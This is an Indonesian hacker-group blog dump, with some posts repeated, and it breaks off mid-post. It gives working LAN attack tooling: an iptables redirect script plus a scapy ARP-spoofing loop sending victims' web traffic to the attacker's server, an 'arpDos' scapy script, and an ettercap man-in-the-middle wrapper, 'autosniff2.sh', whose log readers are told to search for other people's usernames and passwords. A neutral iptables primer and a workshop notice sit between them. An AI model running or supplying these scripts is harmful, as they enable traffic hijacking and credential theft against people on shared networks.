bissmillah...
=============================================
Malang Cyber Crew | indonesian cyber security
=============================================
title : DNS spoofing with scapy
auth0r : yur4kh4
blog : http://www.devirakhjib.uni.cc/
mail : yur4kh4[at]yahoo[dot[com]
date : 23-03-2011
Language : Indonesian
[*]pembuka
tulisan ini di buat semata-mata untuk pelajaran saja, tidak ada maksud untuk merusak & meningkatkan traffic cyber crime di indonesia.
penulis sangat berharap bahwa masyarakat indonesia bisa lebih meningkatkan security di di bidang IT (khususnya bagi para pengelola)internet cafe
& satu hal yang terpenting penulis sangat berharap masyarakat indonesia bisa beralih ke sistem operasi yang open source..hee...
[*] persiapan
" pastikan sistem operasi anda linux
" pastikan python scapy terinstall pada sistem operasi anda
jika belum terinstall python scapy, anda bisa meng install nya lewat synaptic (dalam hal ini saya menggunakan ubuntu)
jika sudah terinstall lanjut ke tahap selanjutnya.,
[*] konfigurasi
yang pertama lakukan IP forwading
echo 1 > /proc/sys/net/ipv4/ip_forward
kemudian non aktivkan ICMP redirect
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
next IP tables setting
Apa saja yang bisa dilakukan dengan iptables?
Dengan kemampuan tools iptables ini, kita bisa membuat aturan (rule), untuk arus lalulintas data.
silahkan googleing untuk penjelasan lebih mendalam.
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface wlan0/eth0 --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0/eth0 --jump MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 10.42.43.23
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination 10.42.43.23
ini bash scriptnya..biar ga repot-repot mengetik di termilal..
--------------------------------------cut here--------------------------------------------------------
#########################################################
# yur4kh4 #
# Malang cyber crew #
# kill-9 crew #
# indonesiancoder team #
#########################################################
#!/bin/sh
INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
#clear rule..
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE
#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination $SERVERWEB
--------------------------------------cut here--------------------------------------------------------
save dengan nama: terserah.sh
selanjutnya
save script python-scapy ini dengan nama : ihir.py
--------------------------------------cut here--------------------------------------------------------
from scapy.all import *;
from time import sleep;
conf.iface='wlan0';#network card
target="10.42.43.1";#target /victim
router="10.42.43.1";#routernya
packet = ARP(); #bikin packet :P
packet.psrc = router # Gateway
packet.pdst = target # victim v.v
try:
while 1:
send(packet, verbose=0);
sleep(50);
except:
pass
--------------------------------------cut here--------------------------------------------------------
nach yg perlu anda lakukan adalah menyesuaikan
INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente
network card yang terkoneksi dengan internet serta ip local anda
&
target="10.42.43.19";#target /victim
router="10.42.43.1";#routernya
kalau ingin semua permintaan packet client berpindah ke web server anda
target="10.42.43.19/24";#target /victim
dengan begitu semua IP local client akan di alihkan ke IP local anda...:D
[*] eksekusi
root@dEviRakhjib:/home/yur4kh4# ./terserah.sh
root@dEviRakhjib:/home/yur4kh4# python ihir.py
yupzz.,..tunggu beberapa saat
semua permintaan packet akan di kirimkan / di alihkan ke IP anda...:D
greettzz.....:D
[*] penutup
dengan di jalankannya ihir.py maka berakhir pula tulisan yang sangat sederhana ini..
semoga sajha mudah untuk di mengerti..namun jika masih di anggap susah untuk di mengerti
silahkan hubungi saya..^_^
YM : yur4kh4
..Jangan berkata TIDAK, karena semua itu BELUM ..
+++++++++++++++++++thankz t0++++++++++++++++++++++++
[&] allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew - kill-9 - Indonesian coder
[%] Arianom, Tukulesto , n4ck0 , marahmerah , kamtiez , vYc0d , xr0b0t
contrex , mboys , Pathloader , t3ll0 , Thunder x c0de, jundab
ibl13z , geni212 , dhomas , kalong666 ,ichal ,jos_ali_joe, mugna
&&**akulukasaatkaupergi**&&
+++++++++++++++++++Luv der4+++++++++++++++++++++++++
mirror : http://packetstormsecurity.org/files/view/99642/dnsspoof-scapy.txt
Showing posts with label yur4_tools. Show all posts
Showing posts with label yur4_tools. Show all posts
Wednesday, March 23, 2011
Wednesday, March 16, 2011
Temu Teman Malang Cyber crew
bismillah...
alhamdullilah..
masih di beri nafas sampai hari ini..hee...
okey.,langsung sajha, kali ini kami dari malang cyber insya allah akan melaksanakan
workshop / lebih tepatnya bagaimana kalau kita sebut sajha dengan temu teman :)
acara yang akan dilaksanakan pada hari minggu tanggal 20 maret ini murni hasil kerja
dari anggota kami sendiri..:)
dengan dana yang seadanya & hasil iuran dari anggota..kami bisa menyusun acara temu teman
yang baru pertama kali kami laksanakan ini..harapannya semoga saja dengan adanya kegitan ini
bisa membangkitkan serta meningkatkan kreativitas & semangat untuk belajar bersama di bidang IT
tidak ada batasan untuk peserta yang ingin mengikuti kegitan ini.
artinya..siapa saja boleh ikut...tanpa di pungut biaya..pendaftaran..:)
adapun beberapa materi yang akan kami bahas dalam acara ini sebagai berikut :
1. root & jump server
mungkin bagi sebagian orang kata root & jump sangat asing di telinga
tapi bagi sebagian orang lagi..root & jump adalah hal biasa.apalagi bagi pengguna linux
istilah root sangat tidak asing lagi di telinga mereka..hee...akan kita bahas lebih mendalam nantinya
2. multi tabnabbing attack (metasploit)
hhhhmmm.,.istilah ini memang mungkin masih sangat membingungkan apa maksudnya...:D , dengan memanfaatkan
kelemahan DNS (domain name server),.kita bisa melakukan tekhnik serangan ini..di bantu dengan sebuah tools
yang sangat mudah untuk di gunakan..:). akan kita bahas lebih mendalam juga nantinya . :p
3. sharing seputar IT
diskusi-diskusi biasa../ silaturahmi sambil membicarakan perkembangan & kelemahan IT yang ada di
indonesia khususnya yang ada di kota malang..siapa saja boleh bicara tentunya..
menurut pandangannya masing-masing..harapannya dari hasil diskusi ini ada follow up nantinya untuk
terus meningkatkan perkembangan IT indonesia..AMIN.
4. why linux is better>??
jelas kita akan membahas secara tuntas mengapa operating system yang satu ini
kita pandang lebih unggul dari OS-OS yang lainnya...:). bahasan ini yang terpenting menurut kami.
nach...selanjutnya bisa kita sesuaikan dengan kebutuhan saat acara nanti..
semoga apa yang kami lakukan ini mendapat respon yang baik dari teman-teman semua..AMIN...
semoga apa yang kami lakukan ini menjadi berkah nantinya..AMIN..
dan tentunya semoga bermanfaat..AMIN..
NB : untuk teman-teman yang di luar kota malang tidak dilarang untuk hadir & mengikuti acara ini.
tapi karena keterbatasan biaya & sebagainya..
kami dari pihak malang cyber tidak bisa memberikan biaya transportasi untuk temand-temand :(
cP :
YM : yur4kh4
bgs_ayie2000
nakula_h3r3
jangan berkata TIDAK, karena semua itu BELUM.
alhamdullilah..
masih di beri nafas sampai hari ini..hee...
okey.,langsung sajha, kali ini kami dari malang cyber insya allah akan melaksanakan
workshop / lebih tepatnya bagaimana kalau kita sebut sajha dengan temu teman :)
acara yang akan dilaksanakan pada hari minggu tanggal 20 maret ini murni hasil kerja
dari anggota kami sendiri..:)
dengan dana yang seadanya & hasil iuran dari anggota..kami bisa menyusun acara temu teman
yang baru pertama kali kami laksanakan ini..harapannya semoga saja dengan adanya kegitan ini
bisa membangkitkan serta meningkatkan kreativitas & semangat untuk belajar bersama di bidang IT
tidak ada batasan untuk peserta yang ingin mengikuti kegitan ini.
artinya..siapa saja boleh ikut...tanpa di pungut biaya..pendaftaran..:)
adapun beberapa materi yang akan kami bahas dalam acara ini sebagai berikut :
1. root & jump server
mungkin bagi sebagian orang kata root & jump sangat asing di telinga
tapi bagi sebagian orang lagi..root & jump adalah hal biasa.apalagi bagi pengguna linux
istilah root sangat tidak asing lagi di telinga mereka..hee...akan kita bahas lebih mendalam nantinya
2. multi tabnabbing attack (metasploit)
hhhhmmm.,.istilah ini memang mungkin masih sangat membingungkan apa maksudnya...:D , dengan memanfaatkan
kelemahan DNS (domain name server),.kita bisa melakukan tekhnik serangan ini..di bantu dengan sebuah tools
yang sangat mudah untuk di gunakan..:). akan kita bahas lebih mendalam juga nantinya . :p
3. sharing seputar IT
diskusi-diskusi biasa../ silaturahmi sambil membicarakan perkembangan & kelemahan IT yang ada di
indonesia khususnya yang ada di kota malang..siapa saja boleh bicara tentunya..
menurut pandangannya masing-masing..harapannya dari hasil diskusi ini ada follow up nantinya untuk
terus meningkatkan perkembangan IT indonesia..AMIN.
4. why linux is better>??
jelas kita akan membahas secara tuntas mengapa operating system yang satu ini
kita pandang lebih unggul dari OS-OS yang lainnya...:). bahasan ini yang terpenting menurut kami.
nach...selanjutnya bisa kita sesuaikan dengan kebutuhan saat acara nanti..
semoga apa yang kami lakukan ini mendapat respon yang baik dari teman-teman semua..AMIN...
semoga apa yang kami lakukan ini menjadi berkah nantinya..AMIN..
dan tentunya semoga bermanfaat..AMIN..
NB : untuk teman-teman yang di luar kota malang tidak dilarang untuk hadir & mengikuti acara ini.
tapi karena keterbatasan biaya & sebagainya..
kami dari pihak malang cyber tidak bisa memberikan biaya transportasi untuk temand-temand :(
cP :
YM : yur4kh4
bgs_ayie2000
nakula_h3r3
jangan berkata TIDAK, karena semua itu BELUM.
Wednesday, March 02, 2011
Friday, February 25, 2011
arpDos with scapy
ini adalah tutorial arpDos dengan menggunakan scapy sebagai tools bantuan kita.,;)
langsung sajha..
.
forwarding ip :D
/proc/sys/net/ipv4/ip_forward
python-scapy script...:)
from scapy.all import *;
from time import sleep;
conf.iface='eth0';#network card XD
target="192.168.1.102";#target /victim
router="192.168.1.1";#routernya
packet = ARP(); #bikin packet :P
packet.psrc = router # Gateway
packet.pdst = target # victim v.v
packet.hwsrc="00:1e:68:a0:56:4b" # mac address ente gan.
try:
while 1:
send(packet, verbose=0);
sleep(50);
except:
pass
-------------------------------------------------------------------
sekarang.,.saatnya sikattt....:D
lebih jelas ini daripada netcut...:p
ihirr.....
regards : yur4kh4
Malang cyber crew | Indonesian Coder | kill -9 crew
langsung sajha..
.
forwarding ip :D
/proc/sys/net/ipv4/ip_forward
python-scapy script...:)
from scapy.all import *;
from time import sleep;
conf.iface='eth0';#network card XD
target="192.168.1.102";#target /victim
router="192.168.1.1";#routernya
packet = ARP(); #bikin packet :P
packet.psrc = router # Gateway
packet.pdst = target # victim v.v
packet.hwsrc="00:1e:68:a0:56:4b" # mac address ente gan.
try:
while 1:
send(packet, verbose=0);
sleep(50);
except:
pass
-------------------------------------------------------------------
sekarang.,.saatnya sikattt....:D
lebih jelas ini daripada netcut...:p
ihirr.....
regards : yur4kh4
Malang cyber crew | Indonesian Coder | kill -9 crew
Friday, February 18, 2011
pengantar ip tables
- Apa itu iptables?
iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita.
- Gimana perintahnya?
iptables [–t tables] [option] [rule] [target]
Contohnya:
iptables –P FORWARD ACCEPT
- Apa saja yang bisa dilakukan dengan iptables?
Dengan kemampuan tools iptables ini, kita bisa melakukan banyak hal dengan iptables. Yang paling penting adalah bahwa dengan iptables ini kita bisa membuat aturan (rule), untuk arus lalulintas data. Aturan aturan itu dapat mencakup banyak hal, seperti besar data yang boleh lewat, jenis paket/datagram yang dapat diterima, mengatur trafic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.
Perlakuan apa saja yang dialami data oleh iptables?
Perlakuan yang dialami oleh data/paket data oleh iptables digambarkan melalui tabel. Macam tabelnya adalah:
1. Filter : tabel default yang ada dalam penggunaan iptables
2. NAT : tabel ini digunakan untuk fungsi NAT, redirect, redirect port
3. Mangle : tabel ini berfungsi sebagai penghalus proses pengaturan paket
Bagaimana kita bisa peroleh informasi tentang iptables tersebut di dalam sistem operasi linux?
Kita bisa peroleh info tentang iptables, dengan cara mengetikkan:
man iptables
atau
iptables –help
Perintah man adalah untuk mendapatkan manual penggunaaan dari iptables ini. Sedangkan help adalah untuk mendapatkan informasi help dari iptables tersebut.
- OPTION
Option terdiri dari command, dan parameter serta opsi tambahan
COMMAND
Command dan rule yang dipasang pada iptables (firewall) memiliki ketentuan. Pada dasarnya iptables pada komputer dianggap sebagai TABEL IP sesuai dengan namanya. System hanya akan menjalan rule yang ada pada tabel. Sedangkan rule yang sudah ada pada iptables juga dapat di hapus atau di replace dengan rule lain. Berikut beberapa command untuk penambahan, penghapusan dan operasi sejenisnya yang akan diperlakukan terhadap rule.
Daftar Perintah berikut keterangan
-A atau –append Melakukan penambahan rule
-D atau –delete Melakukan penghapusan rule
-R atau –replace Melakukan replacing rule
-L atau –list Menampilkan ke display, daftar iptables
-F atau –flush Menghapus daftar iptables/pengosongan
-I atau –insert Melakukan penyisipan rule
-N atau –new-chain Melakukan penambahan chain baru
-X atau –delete-chain Melakukan penghapusan chain
-P atau –policy Memberikan rule standard
-E atau –rename Memberikan penggantian nama
-h atau –help Menampilkan fasilitas help
Table 1. Table Command iptables
Parameter
Parameter iptables digunakan sebagai pelengkap yang diperlukan untuk tujuan spesifikasi rule tersebut
Parameter berikut Keterangan
-p, –protocol (proto) Parameter ini untuk menentukan perlakuan terhadap protokol
-s, –source (address) –-src Parameter untuk menentukan asal paket
-d, –destination (address) –-dst Parameter untuk menentukan tujuan paket
-j, –jump (target)
-g, –goto (chain)
-i, –in-interface Masuk melalui interface (eth0, eth1 dst)
-o, –out-interface
[!] -f, –fragment
-c, –set-counters
Table 2. Tabel Parameter iptables
Parameter berikut Keterangan
–sport
–source-port Menentukan port asal
–dport
–destination-port Menentukan port tujuan
–tcp-flags Menentukan perlakuan datagram
–syn
Table 3. Tabel Parameter detail
Selanjutnya apa itu yang disebut dengan chain?
Chain/rantai digambarkan sebagai jalur aliran data. Chains yang diperlukan untuk iptables ini antara lain:
Chain berikut Keterangan
FORWARD Route packet akan di FORWARD tanpa di proses lanjut di local
INPUT Route packet masuk ke dalam proses lokal sistem
OUTPUT Route packet keluar dari local sistem
PREROUTING Chain yang digunakan untuk keperluan perlakuan sebelum packet masuk route. Biasanya dipakai untuk proses NAT
POSTROUTING Chain yang digunakan untuk keperluan perlakuan sesudah packet masuk route. Biasanya dipakai untuk proses NAT
Tabel 4. Tabel Chain
Chain PREROUTING dan POSTROUTING dimaksudkan sebagai jalur data sebelum dan sesudah data tersebut masuk ke dalam route.
PREROUTING: data sebelum masuk jalur route, akan di kenakan rule
POSTROUTING: data sebelum masuk akan dikenakan route
Apakah target itu?
Target adalah tujuan perlakuan terhadap rule. Pada target ini terletak keputusan, paket data mau diapakan, apakah mau di tolak, atau diteruskan atau diolah terlebih dahulu. Berikut daftar table target iptables
Target berikut Keterangan
ACCEPT Rantai paket tersebut diterima dalam rule
DROP Rantai paket tersebut “dijatuhkan”
REJECT Rantai paket tersebut ditolak seperti DROP
DNAT Rantai paket di “destination nat” kan ke address lain
SNAT Rantai paket di arahkan ke source nat tertentu
REDIRECT Rantai paket di redirect ke suatu addres dan port tertentu
MASQUERADE Bekerja seperti SNAT tapi tidak memerlukan source
REJECT Bekerja seperti DROP
Contoh beberapa kasus untuk iptables
Misalkan terdapat sebuah jaringan komputer menggunakan koneksi internet dengan IP ADDRESS publik
222.124.132.91 (eth0)
Server gateway memiliki 3 anak jaringan (jaringan lokal) dengan dibedakan subnet
192.168.0.0/24 (eth1)
192.168.1.0/24 (eth2)
192.168.10.0/24 (eth3)
Kondisi dalam jaringan, eth3 tidak diperbolehkan melakukan akses ke internet tetapi diperbolehkan masuk ke jaringan lokal lainnya melalui protokol http. Sedangkan eth1 dan eth2 diperbolehkan melakukan akses ke internet. Pada IP ADDRESS 192.168.1.10 terdapat webserver, dan pada IP Address 192.168.1.12 terdapat koleksi intranet yang akan dipublish ke internet. Disamping itu, koneksi internet 1 mega tersebut akan di share, untuk semua komputer di eth2 akan dibatasi pemakaiannya maksimal 10kbps.
semoga bermanfaat..
source : http://bodhon.wordpress.com/
iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita.
- Gimana perintahnya?
iptables [–t tables] [option] [rule] [target]
Contohnya:
iptables –P FORWARD ACCEPT
- Apa saja yang bisa dilakukan dengan iptables?
Dengan kemampuan tools iptables ini, kita bisa melakukan banyak hal dengan iptables. Yang paling penting adalah bahwa dengan iptables ini kita bisa membuat aturan (rule), untuk arus lalulintas data. Aturan aturan itu dapat mencakup banyak hal, seperti besar data yang boleh lewat, jenis paket/datagram yang dapat diterima, mengatur trafic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.
Perlakuan apa saja yang dialami data oleh iptables?
Perlakuan yang dialami oleh data/paket data oleh iptables digambarkan melalui tabel. Macam tabelnya adalah:
1. Filter : tabel default yang ada dalam penggunaan iptables
2. NAT : tabel ini digunakan untuk fungsi NAT, redirect, redirect port
3. Mangle : tabel ini berfungsi sebagai penghalus proses pengaturan paket
Bagaimana kita bisa peroleh informasi tentang iptables tersebut di dalam sistem operasi linux?
Kita bisa peroleh info tentang iptables, dengan cara mengetikkan:
man iptables
atau
iptables –help
Perintah man adalah untuk mendapatkan manual penggunaaan dari iptables ini. Sedangkan help adalah untuk mendapatkan informasi help dari iptables tersebut.
- OPTION
Option terdiri dari command, dan parameter serta opsi tambahan
COMMAND
Command dan rule yang dipasang pada iptables (firewall) memiliki ketentuan. Pada dasarnya iptables pada komputer dianggap sebagai TABEL IP sesuai dengan namanya. System hanya akan menjalan rule yang ada pada tabel. Sedangkan rule yang sudah ada pada iptables juga dapat di hapus atau di replace dengan rule lain. Berikut beberapa command untuk penambahan, penghapusan dan operasi sejenisnya yang akan diperlakukan terhadap rule.
Daftar Perintah berikut keterangan
-A atau –append Melakukan penambahan rule
-D atau –delete Melakukan penghapusan rule
-R atau –replace Melakukan replacing rule
-L atau –list Menampilkan ke display, daftar iptables
-F atau –flush Menghapus daftar iptables/pengosongan
-I atau –insert Melakukan penyisipan rule
-N atau –new-chain Melakukan penambahan chain baru
-X atau –delete-chain Melakukan penghapusan chain
-P atau –policy Memberikan rule standard
-E atau –rename Memberikan penggantian nama
-h atau –help Menampilkan fasilitas help
Table 1. Table Command iptables
Parameter
Parameter iptables digunakan sebagai pelengkap yang diperlukan untuk tujuan spesifikasi rule tersebut
Parameter berikut Keterangan
-p, –protocol (proto) Parameter ini untuk menentukan perlakuan terhadap protokol
-s, –source (address) –-src Parameter untuk menentukan asal paket
-d, –destination (address) –-dst Parameter untuk menentukan tujuan paket
-j, –jump (target)
-g, –goto (chain)
-i, –in-interface Masuk melalui interface (eth0, eth1 dst)
-o, –out-interface
[!] -f, –fragment
-c, –set-counters
Table 2. Tabel Parameter iptables
Parameter berikut Keterangan
–sport
–source-port Menentukan port asal
–dport
–destination-port Menentukan port tujuan
–tcp-flags Menentukan perlakuan datagram
–syn
Table 3. Tabel Parameter detail
Selanjutnya apa itu yang disebut dengan chain?
Chain/rantai digambarkan sebagai jalur aliran data. Chains yang diperlukan untuk iptables ini antara lain:
Chain berikut Keterangan
FORWARD Route packet akan di FORWARD tanpa di proses lanjut di local
INPUT Route packet masuk ke dalam proses lokal sistem
OUTPUT Route packet keluar dari local sistem
PREROUTING Chain yang digunakan untuk keperluan perlakuan sebelum packet masuk route. Biasanya dipakai untuk proses NAT
POSTROUTING Chain yang digunakan untuk keperluan perlakuan sesudah packet masuk route. Biasanya dipakai untuk proses NAT
Tabel 4. Tabel Chain
Chain PREROUTING dan POSTROUTING dimaksudkan sebagai jalur data sebelum dan sesudah data tersebut masuk ke dalam route.
PREROUTING: data sebelum masuk jalur route, akan di kenakan rule
POSTROUTING: data sebelum masuk akan dikenakan route
Apakah target itu?
Target adalah tujuan perlakuan terhadap rule. Pada target ini terletak keputusan, paket data mau diapakan, apakah mau di tolak, atau diteruskan atau diolah terlebih dahulu. Berikut daftar table target iptables
Target berikut Keterangan
ACCEPT Rantai paket tersebut diterima dalam rule
DROP Rantai paket tersebut “dijatuhkan”
REJECT Rantai paket tersebut ditolak seperti DROP
DNAT Rantai paket di “destination nat” kan ke address lain
SNAT Rantai paket di arahkan ke source nat tertentu
REDIRECT Rantai paket di redirect ke suatu addres dan port tertentu
MASQUERADE Bekerja seperti SNAT tapi tidak memerlukan source
REJECT Bekerja seperti DROP
Contoh beberapa kasus untuk iptables
Misalkan terdapat sebuah jaringan komputer menggunakan koneksi internet dengan IP ADDRESS publik
222.124.132.91 (eth0)
Server gateway memiliki 3 anak jaringan (jaringan lokal) dengan dibedakan subnet
192.168.0.0/24 (eth1)
192.168.1.0/24 (eth2)
192.168.10.0/24 (eth3)
Kondisi dalam jaringan, eth3 tidak diperbolehkan melakukan akses ke internet tetapi diperbolehkan masuk ke jaringan lokal lainnya melalui protokol http. Sedangkan eth1 dan eth2 diperbolehkan melakukan akses ke internet. Pada IP ADDRESS 192.168.1.10 terdapat webserver, dan pada IP Address 192.168.1.12 terdapat koleksi intranet yang akan dipublish ke internet. Disamping itu, koneksi internet 1 mega tersebut akan di share, untuk semua komputer di eth2 akan dibatasi pemakaiannya maksimal 10kbps.
semoga bermanfaat..
source : http://bodhon.wordpress.com/
WEAKERTHAN2 (security network OS)
WEAKERTHAN adalah distro yang di kembangkan oleh team weaknet labs di bawah pimpinan
~Douglas. (a.k.a. Trevelyn), kalau di lihat-lihat distro yang satu ini di khususkan untuk
para admin networking..bukan berarti newbie-newbie seperti kita ga boleh pake lo..heee
karena kalau kita lihat tools-tools yang di sertakan di dalam
distro ini rata-rata memang untuk menguji dan mengamankan jaringan, meskipun ada beberapa
tools web hacking :p. namun tidak begitu kental...
tidak seperti distro pentest kebanyakan yang sering kita temui disto yang satu ini
menggunakan tools-tools yang berbeda dengan yang lainnya...:)
menariknya lagi..release distro yang di buat dengan basic dasar ubuntu 10.4 ini memiliki
kecepatan yang tinggi..pada saat bootingnya..bahkan saat penulis mencoba menjalankan
weaknet di live USB, tidak ada prosess booting yg terlihat..:D
dalam hitungan 3 sd 4 detik, kita sudah bisa menjumpai desktop distro yang satu ini..
namun meskipun merupakan remaster dari ubuntu 10.4 penggunaanya tidak semudah ubuntu 10.4
jika pada ubuntu 10.4 kita menjumpai banyak kemudahan dalam mengoperasikan operating systemny
maka weaknet ini justru sebaliknya...
kita akan berhadapan terus dengan yang namanya terminal..
kebanyakan aplikasi yang di install di distro ini menggunakan terminal sebagai media untuk menjalankannya
seperti menjalankan
xchat yang di ganti dengan irssi
nautilus yang di gandeng dengan MC
rythombox yang di ganti dengan xmms/mp3blaster
dan lain sebagainya..:)
untuk teman-teman yang ingin mencicipi distro yang satu ini silahkan download di
http://weaknetlabs.com/weaknet/download/weakerthan.html
sebenarnya team dari pengembang distro ini tidak menganjurkan OS ini untuk di install di hardisk
itu di karenakan masi ada bugs pada file ubiquitynya (installernya) namun hal itu masih bisa di atasi :)
kemudian pada file grubnya juga terdapat bugs, saya sarankan jangan gunakan grub dari weaknet untuk di pasang di
MBR..sialhkan di setting di advance saat proses installasi bagian akhir
silahkan googleing sajha..
jika mendapatkan kesulitan dalam proses installasi silahkan kontak saya..:)
g0o0...open source...
go0o..unix
regards yur4kh4
Malang cyber crew
Wednesday, February 16, 2011
./beef browser exploit
browser exploit tools..
on backtrack..
lebih jelasnya ada di link yg di bawah ini...
http://www.indotubez.com/video/beef_dem0_on_backtrack
Monday, November 15, 2010
./autosniff2.sh + penjelasan
hi saya yur4kh4.,:)
assalamuallaikum...
saLam sejahtera..
kali ini kita akan membahas tentang ettercap
Ettercap adalah sebuah alat yang dibuat oleh Alberto Ornaghi (AloR) dan Marco Valleri (NaGa) dan pada dasarnya adalah sebuah perlengkapan untuk penyerangan “penengah” pada sebuah LAN ataupun WLAN. Untuk mereka yang tidak menyukai perintah berbaris (CLI), alat bentu ini disediakan dengan antar muka grafis yang mudah.
Ettercap memungkinkan membentuk serangan melawan protokol ARP dengan memposisikan diri sebagai “penengah, orang yang ditengah” dan, jika sudah berada pada posisi tersebut, maka akan memungkinkan untuk :
- menginfeksi, mengganti, menghapus data dalam sebuah koneksi
- melihat password pada protokol-protokol seperti FTP, HTTP, POP, SSH1, dan lain-lain.
- menyediakan SSL sertifikasi palsu dalam bagian HTTPS pada korban.
- dan lain-lain.
woow.,.bisa di bayangkan apa bahayanya jika mesin / computer kita..di bajak oleh seorang sniffer...:D
hal ini tentu sangat merugikan kita sebagai seorang client..
baikLah..kali ini penulis akan menjelaskan bagaimana melakukan serangan ini..
penulis tidak mengajarkan temand-temand untuk menjadi seeorang sniffer..
melainkan hanya untuk memberitahukan bagaimana cara kerjanya saja..
dengan tujuan agar kita lebih berhati-hati pada saat terkoneksi ke internet..
1 install ettercapnya dulu
# sudo apt-get install ettercap
2. konfigurasi lach.,.:)
# sudo gedit /etc/etter.conf
cari baris ini..
#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
hilangkan tanda ' # ' . kemudian save...ukey...
3. jalankan ettercapnya..
# sudo ettercap -Tq -i wlan0 -M arp // //
penjelasan :
-T = mode ettercapnya
-i = interface yang aktif (bisa di lihat dg mengetikan ifconfig di terminal)
-q quiet mode
-M = arp poisoning
sementara tanda // // adalah default gatway & client ini bisa di isi dengan ip victim (jika victim tunggal)
jangan lupa forward ip juga ya...
# echo 1 > /proc/sys/net/ipv4/ip_forward
ukey.,.selesai...tinggal tunggu hasilnya saja.,.:)
NB :
jika belum familiar dengan console..
saya sudah siapkan sdkit script bashnya...
jadi tinggal jalankan 1 script saja..udh bisa jalankan ettercap koq..
langsung copas scriptnya...:)
--------------cut here-----------------------------------------------
########################################################
# c0de by yur4kh4 #
# auto sniff #
# Malang cyber crew #
# contact :yur4kh4[at]mc-crew[dot]net #
########################################################
#!/bin/bash
sleep 3
echo "jangan malas untuk menulis di console"
sleep 2
echo -n "network card yang terkoneksi gan? ex: wlan0: "
read -e IFACE
echo -n "Gateway IP - biarkan kosong (default): "
read -e ROUTER
echo -n "Target IP - biarkan kosong (babat semua IP): "
read -e VICTIM
ettercap -Tq -i $IFACE -M arp /$ROUTER/ /$VICTIM/ -w yur4.txt
--------------cut here-----------------------------------------------
save dengan nama autosniff2.sh
kemudian beri hak akses root
# chmod +x autosniff2.sh
masih di terminal jalankan dech scriptnya
# ./autosniff2.sh
tinggal tunggu saja...
pastikan ettercap sudah di install & sudah di konfigurasi dengan benar...
pastikan juga bahwa ip sudah di forward..
untuk berhenti tekan ' q ' 'Q' <
script ini akan menghasilkan log yur4.txt
buka hasil log tersebut...
menggunakan kate or apa saja lach yang penting bisa terbaca...:p
kemudian search or ctrl F masukan keywords "pass" atau bisa juga "user"
heee.,.
kalo ada yang tersniffing maka akan tampil tu user sama pass orang.,.:p
tested on backtrack 4
assalamuallaikum...
saLam sejahtera..
kali ini kita akan membahas tentang ettercap
Ettercap adalah sebuah alat yang dibuat oleh Alberto Ornaghi (AloR) dan Marco Valleri (NaGa) dan pada dasarnya adalah sebuah perlengkapan untuk penyerangan “penengah” pada sebuah LAN ataupun WLAN. Untuk mereka yang tidak menyukai perintah berbaris (CLI), alat bentu ini disediakan dengan antar muka grafis yang mudah.
Ettercap memungkinkan membentuk serangan melawan protokol ARP dengan memposisikan diri sebagai “penengah, orang yang ditengah” dan, jika sudah berada pada posisi tersebut, maka akan memungkinkan untuk :
- menginfeksi, mengganti, menghapus data dalam sebuah koneksi
- melihat password pada protokol-protokol seperti FTP, HTTP, POP, SSH1, dan lain-lain.
- menyediakan SSL sertifikasi palsu dalam bagian HTTPS pada korban.
- dan lain-lain.
woow.,.bisa di bayangkan apa bahayanya jika mesin / computer kita..di bajak oleh seorang sniffer...:D
hal ini tentu sangat merugikan kita sebagai seorang client..
baikLah..kali ini penulis akan menjelaskan bagaimana melakukan serangan ini..
penulis tidak mengajarkan temand-temand untuk menjadi seeorang sniffer..
melainkan hanya untuk memberitahukan bagaimana cara kerjanya saja..
dengan tujuan agar kita lebih berhati-hati pada saat terkoneksi ke internet..
1 install ettercapnya dulu
# sudo apt-get install ettercap
2. konfigurasi lach.,.:)
# sudo gedit /etc/etter.conf
cari baris ini..
#####################################
# redir_command_on/off
#####################################
